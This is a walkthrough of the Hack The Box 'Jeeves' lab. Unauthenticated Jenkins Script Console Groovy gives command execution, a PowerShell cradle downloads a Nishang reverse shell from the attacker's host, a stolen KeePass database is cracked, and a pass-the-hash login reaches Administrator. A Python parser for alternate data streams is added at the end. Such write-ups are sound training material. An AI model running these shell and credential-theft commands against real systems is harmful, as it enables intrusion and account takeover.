Target IP: 10.10.10.63

Exploitation Summary

Initial Exploitation

  • Vulnerability: Remote code execution via the Jenkins Script Console
  • Explanation: The Jenkins instance on port 50000 (/askjeeves) is reachable without authentication, and its Script Console runs arbitrary Groovy on the server, which gives command execution as the Jenkins service account (jeeves\kohsuke)

Privilege Escalation

  • Vulnerability: Weak master password on a KeePass database (CEH.kdbx)
  • Explanation: The database stores credentials, including administrative ones, but is protected by a master password that cracks with rockyou. One entry holds the Administrator account's NTLM hash, which is enough for a pass-the-hash login over SMB

Enumeration

nmap -p- -A -T4 10.10.10.63
TCP 80: IIS 10.0
TCP 135: RPC
TCP 445: Microsoft-ds
TCP 50000: Jetty 9.4.z-SNAPSHOT (http)

Initial Shell Exploitation

A quick check on port 445 with smbmap -H 10.10.10.63 shows that credentials are needed, so there is not much to gather there for now. Two websites are running, one on port 80 and another on port 50000. Let's look at the default port 80 first.


Cool, it looks like we can ask Jeeves some questions. I type something random and click Search.


Oh wow. Am I lucky? Could this be the entry point? I go back and do a few more searches. Interestingly, all of them produce the same error, so I check the source of the search page.


It turns out the search ALWAYS returns the error page, whatever the input. Nothing is searched dynamically; the form is a dead end, not an injection point.

Ok, let’s check out the other website:


Ah, there’s no content on this website.

Directory scan using gobuster

Gobuster finds nothing interesting on port 80 but turns up a directory /askjeeves on port 50000 with the following command (recent gobuster releases refuse -s unless the default 404 blacklist is cleared with -b ''):

gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,401,403"

Navigate to http://10.10.10.63:50000/askjeeves


Jenkins. Nice, finally something. Better still, it does not require a login, and I can reach the Script Console at Manage Jenkins > Script Console.


Jenkins is an open source automation server with hundreds of plugins for building, deploying and automating projects (https://jenkins.io). Its Script Console executes arbitrary Groovy inside the Jenkins controller's JVM, with the privileges of the account the service runs as, so any Jenkins that exposes it without authentication hands out remote code execution on the server. It is meant to be limited to administrators (the Overall/Administer permission); an instance with security disabled, like this one, gives it to anyone who can reach the port.

Let's test by running whoami with the following Groovy script:

def sout = new StringBuffer(), serr = new StringBuffer()
String ps = 'whoami'
def proc = ps.execute()               // runs on the Jenkins controller, as the service account
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)              // fine for a one-shot command, not for a long-lived shell
println "out> $sout err> $serr"

The command runs and shows that the Jenkins service, and therefore anything launched from the Script Console, executes as jeeves\kohsuke.

I would like a reverse shell via a PowerShell script. Let's check that PowerShell is present by changing the command to:

String ps = 'cmd /c "cd / && dir powershell.exe /s"'

(where powershell.exe would answer faster than a recursive dir.) Note that Groovy's String.execute() splits the string on whitespace and ignores the quotes; this still works because Windows reassembles the argument list into a single command line for cmd.exe, but passing the arguments to execute() as a Groovy list is the reliable form.

Nice, PowerShell is available. Now I would like to use Invoke-PowerShellTcp.ps1 from Nishang to get a reverse shell.

Set up a web server to host Invoke-PowerShellTcp.ps1

If you don't already have this PowerShell script, you can install Nishang with:

apt-get install nishang

Serve the script from the directory it lives in with any simple HTTP server on port 80 (the download URL used below has no explicit port). I also append the following line to the end of the script so the reverse shell is launched as soon as the target has downloaded and executed it:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 443

Netcat to listen on port 443

nc -nvlp 443

Run the following script in the Script Console to make the target download Invoke-PowerShellTcp.ps1 and execute it in memory:

def sout = new StringBuffer(), serr = new StringBuffer()
String cmd = "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.34/Invoke-PowerShellTcp.ps1')"
String ps = 'powershell -c "' + cmd + '"' 
def proc = ps.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr" 
Note: waitForOrKill is deliberately left out here. It would kill the PowerShell process after the timeout and take the reverse shell with it; consumeProcessOutput lets the Groovy script return while the process keeps running in the background.

Got the user shell!

User flag


Privilege Escalation

Browsing around C:\Users\kohsuke I quickly find an interesting file, CEH.kdbx, in C:\Users\kohsuke\Documents. The .kdbx extension marks a KeePass 2.x database, a file used to store and protect credentials. It is encrypted, but it is only as strong as its master password.

Download CEH.kdbx using smbserver

impacket-smbserver Share `pwd`

This shares the current working directory (here /root/work) under the name Share, reachable from the target as \\10.10.14.34\Share. Impacket's server accepts anonymous connections, which is what makes the copy from the target painless; if a newer Windows host refuses the SMB1 connection, start it with -smb2support. Now issue the copy command on the target:

copy CEH.kdbx \\10.10.14.34\Share

Crack keepass master password

keepass2john CEH.kdbx > keepass-hash
john keepass-hash --wordlist=/usr/share/wordlists/rockyou.txt 

Found the master password: moonshine1

Open CEH.kdbx using keepass

I download KeePass and install it on my Windows VM to open CEH.kdbx (kpcli on Linux would do as well).

Enter the master password to reveal the credentials


There is a bunch of passwords in it. If any of them belongs to the Administrator account, we can log in with pth-winexe over port 445 (it accepts user%password as well as user%hash).

I try them all and none works. The very last entry, titled 'Backup stuff', is not a password but a hash in LM:NT form. The LM half, aad3b435b51404eeaad3b435b51404ee, is the well-known hash of an empty LM password (LM hashing disabled), so the NT half is the credential. With NTLM authentication the hash itself is enough; there is no need to crack it. Let's try pass-the-hash:

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe 

Got it. Logged in as administrator.

Root flag

There is no root.txt in the usual place, only hm.txt, which tells me to look deeper. Listing the directory with dir /R (which also shows NTFS alternate data streams) reveals a stream named root.txt attached to hm.txt, shown as hm.txt:root.txt with a :$DATA suffix. A plain dir, Explorer and Get-ChildItem never show such streams, which is how the flag stays out of sight. The stream's content can be read with PowerShell:

Get-Content -Path hm.txt -Stream root.txt
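Hunting for streams like this one across a whole host is easier if the dir /R output is parsed rather than eyeballed. The Python below is an added example, not from the writeup: it pulls every <file>:<stream>:$DATA line out of a dir /R listing, drops the benign Zone.Identifier mark-of-the-web streams, and pairs each hit with the Get-Content -Stream command used above. The listing embedded in it is constructed to mimic dir /R output (the sizes, dates and the .lnk file are made up); the hm.txt:root.txt stream is the one from the box.

```python
"""Find NTFS alternate data streams in `dir /R` output.

Added example, not part of the original writeup. `dir /R` prints each stream
as an indented line "<size> <file>:<stream>:$DATA" directly under the file's
own entry. The sample listing below is constructed to mimic that format; on a
real host, capture `dir /R` (or `dir /R /S` for a whole tree) and feed it in.
"""
import re
from typing import List, Tuple

# Constructed sample of `dir /R` output (not captured from the box).
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is ABCD-1234

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Update Assistant.lnk
                                    26 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)  27,000,000,000 bytes free
"""

# A stream line carries no date, only the size and "<file>:<stream>:$DATA".
STREAM_RE = re.compile(r"^\s+(\d+)\s+(.+?):([^:\\/]+):\$DATA\s*$")


def find_streams(listing: str, ignore_zone_identifier: bool = True) -> List[Tuple[str, str, int]]:
    """Return (file, stream, size) for every alternate data stream in the listing."""
    hits = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if not m:
            continue
        size, fname, stream = int(m.group(1)), m.group(2), m.group(3)
        if ignore_zone_identifier and stream == "Zone.Identifier":
            continue  # mark-of-the-web: benign and very common on downloaded files
        hits.append((fname, stream, size))
    return hits


def read_command(fname: str, stream: str) -> str:
    """PowerShell one-liner that dumps the stream (the writeup's Get-Content form)."""
    return "Get-Content -Path '%s' -Stream '%s'" % (fname, stream)


if __name__ == "__main__":
    for fname, stream, size in find_streams(SAMPLE_DIR_R):
        print("%s:%s (%d bytes)  ->  %s" % (fname, stream, size, read_command(fname, stream)))
```

On a live system the same enumeration is available natively with Get-Item -Path <file> -Stream *, but parsing dir /R output works on any capture, including one pulled back from a shell that only has cmd.exe.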

Thanks to mrb3n, the creator of the Jeeves box!
